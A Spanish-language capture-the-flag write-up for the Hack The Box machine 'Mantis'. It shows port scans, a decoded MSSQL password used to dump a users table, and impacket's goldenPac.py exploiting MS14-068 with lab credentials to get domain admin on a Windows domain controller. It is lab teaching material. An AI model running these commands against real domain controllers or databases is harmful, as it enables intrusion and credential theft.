# MANTIS ## Enumeración ### Nmap ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# nmap -sS -Pn --min-rate 5000 -p- 10.10.10.52 -oG allPorts Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 22:37 -05 Nmap scan report for 10.10.10.52 Host is up (0.26s latency). Not shown: 65508 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1337/tcp open waste 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 8080/tcp open http-proxy 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49164/tcp open unknown 49166/tcp open unknown 49171/tcp open unknown 50255/tcp open unknown ``` ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# nmap -sCV --min-rate 5000 -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49164,49166,49171,50255 10.10.10.52 -oN targeted Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 22:38 -05 Nmap scan report for 10.10.10.52 Host is up (0.26s latency). PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-23 03:38:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open tcpwrapped 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1337/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM |_ssl-date: 2022-02-23T03:39:43+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-02-23T03:15:32 |_Not valid after: 2052-02-23T03:15:32 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local |_ Product_Version: 6.1.7601 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49164/tcp open msrpc Microsoft Windows RPC 49166/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 |_ssl-date: 2022-02-23T03:39:43+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-02-23T03:15:32 |_Not valid after: 2052-02-23T03:15:32 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local |_ Product_Version: 6.1.7601 Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2022-02-22T22:39:29-05:00 | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb2-time: | date: 2022-02-23T03:39:32 |_ start_date: 2022-02-23T03:15:05 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.1: |_ Message signing enabled and required |_clock-skew: mean: 42m52s, deviation: 1h53m24s, median: 0s ``` Reconocimiento del equipo: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# crackmapexec smb 10.10.10.52 SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) ``` ### rpcclient Accediendo al servicio con una sesión nula pero no se tienen privilegios: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# rpcclient -U "" 10.10.10.52 -N rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED ``` ### smb Intentando listar recursos y entablar un conexión por SMB con el usuario `anonymous` : ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# smbmap -H 10.10.10.52 -u '' [+] IP: 10.10.10.52:445 Name: 10.10.10.52 ``` ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# smbclient -L //10.10.10.52/ -N Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ```  ### Web - HTTP ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# wfuzz -c --hc=404 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://10.10.10.52:1337/FUZZ' ``` Se encuentra el recurso `http://10.10.10.52:1337/secure_notes` `301 1 L 10 W 160 Ch "secure_notes"`   ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -ps m$$ql_S@_P@ssW0rd! ``` ## MSSQL Se tiene el servicio MSSQL abierto en el puerto 1443 y las credenciales `admin:m$$ql_S@_P@ssW0rd!`. Validando las crendenciales: ``` ┌──(root💀kali)-[/home/cr4y0/Descargas/dbeaver/dbeaver] └─# crackmapexec mssql 10.10.10.52 -u 'admin' -p 'm$$ql_S@_P@ssW0rd!' --local-auth MSSQL 10.10.10.52 1433 MANTIS [*] Windows 6.1 Build 7601 (name:MANTIS) (domain:MANTIS) MSSQL 10.10.10.52 1433 MANTIS [+] admin:m$$ql_S@_P@ssW0rd! ``` Se establece una conexión con `mssqlclient.py` al servicio MSSQL: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# /opt/impacket/examples/mssqlclient.py htb.local/'admin':'m$$ql_S@_P@ssW0rd!'@10.10.10.52 ```  ### Mssqclient #### Querys Se obtiene las bases de datos: `SELECT name FROM master..sysdatabases;` ``` master tempdb model msdb orcharddb ``` Se obtienen las tablas de la base de datos `orcharddb`: ``` SQL> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'; ```  `blog_Orchard_Users_UserPartRecord` Se selecciona la base de datos `orcharddb`: ``` SQL> USE orcharddb; ``` Se selecciona toda la información de la tabla `blog_Orchard_Users_UserPartRecord`: ``` SQL> SELECT * FROM blog_Orchard_Users_UserPartRecord; ``` ### sqsh ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# sqsh -U 'admin' -S 10.10.10.52 sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty' Password: 1> USE orcharddb; 2> go 1> SELECT * FROM blog_Orchard_Users_UserPartRecord; 2> go -m html > index.html ```  ### dbeaver La herramienta `dbeaver` brinda una GUI para la visualización y conexión al servicio MSSQL: Estableciendo una conexión:  Visualizando la información de la tabla `blog_Orchard_Users_UserPartRecord`:  No se tiene permisos para ejecutar en la base de datos:   ## Kerberos - 88 Cuando Kerberos está activo, se suele probar un ataque "Vulnerability en Kerberos" MS14-068 Básicamente, es una vulnerabilidad crítica en los DC de Windows que permite a un usuario simple obtener un boleto dorado sin ser administrador. Con ese ticket, básicamente soy un administrador de dominio. La vulnerabilidad consiste en que un atacante logra modificar el token de inicio de sesión de usuario de dominio válido agregando una declaración falsa de que un usuario es miembro de los administradores del dominio. Cuando un usuario inicia sesión con credenciales de dominio por primera vez, el controlador de dominio lo que hace es validar el nombre de usuario y la contraseña, luego el DC enumera las restricciones de inicio de sesión y el grupo de usuarios a los que pertenece. Entonces se crea un Token de Inicio de sesión de domnio(TGT) y se le proporciona al usuario. Uno de los beneficios que tiene kerberos es que el usuario no tiene que volver a autenticarse en el controlador del dominio. Solo presenta el TokenDeInicio de Session(TGT) al DC y recibe un token de acceso a Recursos(TGS). Los tickets kerberos firmados por un DC en la red son confiables. ``` ┌──(root💀kali)-[/home/…/Escritorio/HTB/MANTIS/bloodhound] └─# /opt/impacket/examples/goldenPac.py htb.local/'james':'J@m3s_P@ssW0rd!'@mantis.htb.local ```  #### Sol2(No concretado) Agregaré el controlador de dominio a mi `/etc/hosts`:  Agregue Mantis como un servidor DNS en `/etc/resolv.conf`:  Para verificar la hora remota y asegurarme de que esté dentro de los cinco minutos de la hora de mi anfitrión. ~~~ rdate -n 10.10.10.52 -v ~~~  Generar ticket de Kerberos Primero probaré esta configuración e intentaré generar un ticket de Kerberos:    ~~~ james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1) ~~~ https://forum.hackthebox.com/t/mantis-write-up-by-alamot/458 https://0xdf.gitlab.io/2020/09/03/htb-mantis.html